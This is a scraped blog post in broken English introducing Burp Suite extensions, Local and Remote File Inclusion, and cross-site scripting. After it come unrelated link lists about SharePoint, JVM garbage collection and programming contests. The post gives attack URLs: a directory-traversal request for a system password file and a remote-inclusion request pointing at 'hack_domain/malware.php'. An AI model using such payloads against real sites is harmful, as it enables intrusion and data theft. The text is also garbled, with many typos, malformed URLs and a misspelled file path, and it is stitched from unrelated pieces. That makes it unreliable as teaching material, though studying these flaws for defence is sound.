1、 File inclusion

berfoe start this caption  i make a conclusion for install third-part as follow

I not include the sequence decoder and Comparer tabls in this blogs ,because i think their usage is very straightforward ,and in fact ,rarely usee them in career,so it's waste my time .if you want to add the functionality to scan for outdated javaScript libraries ,you can install the module Retire.js   bisides it, WAF ,errors, java, Net,SQLi,XSS, and so on.for me usually used in my burpsuite.  before install the BApp Store ,frist install Jyython  (Jython is a library for java and Python ,and some apps use this library ,so it's a Prrequisite for apps  to work )

if you can't install BApp in correct, you can restart application, use the command (you must use per version).

java -XX:MaxPermSize=1G -jar [ burp_file_name.jar]

File inclusion this Vulnerability can be exploited by including a file in the url ,the file that was included can be local to the server ,and thus  be called Local File inclusion, or can point to remote a remote file, and thus called a Remote file inclusion . but at present the programming and web servers have buit-in mechanisms to protect against this flaw.in real life there is some developer forgets to include a validation on server side such these legacy programming languages  JSP、ASP、PHP。

the Feist one is   Local File Inclusion will allow direction traversal characters such as dot-dot-slash to be injection.   such as:   | http:///domain_name/index.php?file=hack.html

we can changer the hack file to another file on the web server system can checked:     | http:///domain_name/index.php?file=../../../../ect/password

as follow picture screenshot

now we can change the page=

the second is Remote file Inclusion : a file path in the url taht points to the remote file outside the boundaries of the web server that hosts the web application

likes this : http://domain_name/index.php?file=http://hack_domain/malware.php   as follow i changer the to my blog site

2、Cross-Site Scripting

it's means XSS as we usually said.  is exploited when the attacker can successfully execute any type of script (for example, JavaScript) on the victim's browser. These types of flaws exist because the developer did not validate the request or correctly encoded the response of the application. JavaScript is not the only script language used for XSS but it is the most common (in fact it's my favorite); attackers sometimes use scripting languages such as VBScript, ActiveX, Flash, and many more.

Web Application Vulnerablities的更多相关文章

  1. Web Application Penetration Testing Local File Inclusion (LFI) Testing Techniques

    Web Application Penetration Testing Local File Inclusion (LFI) Testing Techniques Jan 04, 2017, Vers ...

  2. 微软压力测试工具 web application stress

    转自 http://www.cnblogs.com/tonykan/p/3514749.html lbimba  铜牌会员 这里给广大的煤油推荐一个web网站压力测试工具.它可以用来模拟多个用户操作网 ...

  3. 使用Microsoft Web Application Stress Tool对web进行压力测试

    Web压力测试是目前比较流行的话题,利用Web压力测试可以有效地测试一些Web服务器的运行状态和响应时间等等,对于Web服务器的承受力测试是个非常好的手法.Web 压力测试通常是利用一些工具,例如微软 ...

  4. 实验环境里新创建成功的web application却在浏览器中返回404错误

    刚刚翻笔记翻到一些刚学SharePoint时候解决的一些很2的初级问题,本来是有些挣扎该不该把它们记录到这个blog里的?因为担心这些很初级的文章会拉低这个blog的逼格,但是我的哥们善意的提醒了我一 ...

  5. SharePoint创建web application出现“The password supplied with the username was not correct”错误的解决方法

    平台环境 Windows Server 2012 R2 Standard, SharePoint Server 2010, Microsoft SQL Server 2012 (SP1) 问题描述 在 ...

  6. SharePoint中新创建的Web Application在浏览器中报404错误

    问题描述:在安装完成SharePoint 2010后,进入Central Administration,创建一个新的Web Application,可以正常创建,但访问时却返回404. 平台环境:Wi ...

  7. Intellij Idea中的Jetty报出Web application not found src/main/webapp错误的解决方案

    今天在Intellij Idea中编译项目的时候,运行起来一直会报出如下的错误: Web application not found src/main/webapp 当时感觉应该是什么文件缺少了.所以 ...

  8. 如何Recycle一个SharePoint Web Application,以及为什么

    当你发现SharePoint服务器的CPU或者内存使用率居高不下的时候,很多人都会选择iisreset来让资源使用率降下来.但是在企业环境中,这毫无疑问会使这台服务器中断服务从而影响到用户的使用,所以 ...

  9. You may receive an exception when you browse a .NET Framework 2.0 ASP.NET Web application

    SYMPTOMS When you browse a Microsoft .NET Framework 2.0 ASP.NET Web application, you may receive one ...

随机推荐

  1. Messenger更改系统语言以后无法登陆,提示“初始设置被修改”

    在安装messenger机器上使用SQL management studio打开数据库,链接YCD的数据库,找到dbo.Dic_Defaults的表,编辑打开以后找到“CultureInfo”两项,删 ...

  2. jvm 垃圾回收机制和算法(转)

    stop-the-world 在学习Java GC 之前,我们需要记住一个单词:stop-the-world .它会在任何一种GC算法中发生.stop-the-world 意味着JVM因为需要执行GC ...

  3. [BZOJ 4516] [SDOI 2016] 生成魔咒

    Description 魔咒串由许多魔咒字符组成,魔咒字符可以用数字表示.例如可以将魔咒字符 1.2 拼凑起来形成一个魔咒串 [1,2]. 一个魔咒串 S 的非空字串被称为魔咒串 S 的生成魔咒. 例 ...

  4. 洛谷P2634 聪明可可

    还是点分治 树上问题真有趣ovo,这道题统计模3为0的距离,可以把重心的子树分开统计,也可以一次性统计,然后容斥原理减掉重复的.. 其他的过程就是点分治的板子啦. #include <bits/ ...

  5. 【APIO2016】【UOJ205】【LOJ2568】烟花表演 可合并堆

    题目大意 有一棵树,每条边都有一个边权,现在你要修改边权,使得修改后根到所有叶子的距离相等. 要求所有边权非负. 修改的代价为\(\lvert\)每条边修改前的边权\(-\)修改后的边权\(\rver ...

  6. Magento 2 Block模板终极指南

    /view/frontend/page_layout/2columns-left.xml <layout xmlns:xsi="http://www.w3.org/2001/XMLSc ...

  7. 洛谷P2822 组合数问题(题解)

    https://www.luogu.org/problemnew/show/P2822(题目传送) 先了解一下有关组合数的公式:(m在上,n在下) 组合数通项公式:C(n,m)=n!/[m!(n-m) ...

  8. POJ 3186 Treats for the Cows (动态规划)

    Description FJ has purchased N (1 <= N <= 2000) yummy treats for the cows who get money for gi ...

  9. Python生成器,迭代器,可迭代对象

    在了解Python的数据结构时,容器(container).可迭代对象(iterable).迭代器(iterator).生成器(generator).列表/集合/字典推导式(list,set,dict ...

  10. [物理学与PDEs]第4章习题4 一维理想反应流体力学方程组的守恒律形式及其 R.H. 条件

    写出在忽略粘性与热传导性, 即设 $\mu=\mu'=\kappa=0$ 的情况, 在 Euler 坐标系下具守恒律形式的一维反应流动力学方程组. 由此求出在解的强间断线上应满足的 R.H. 条件 ( ...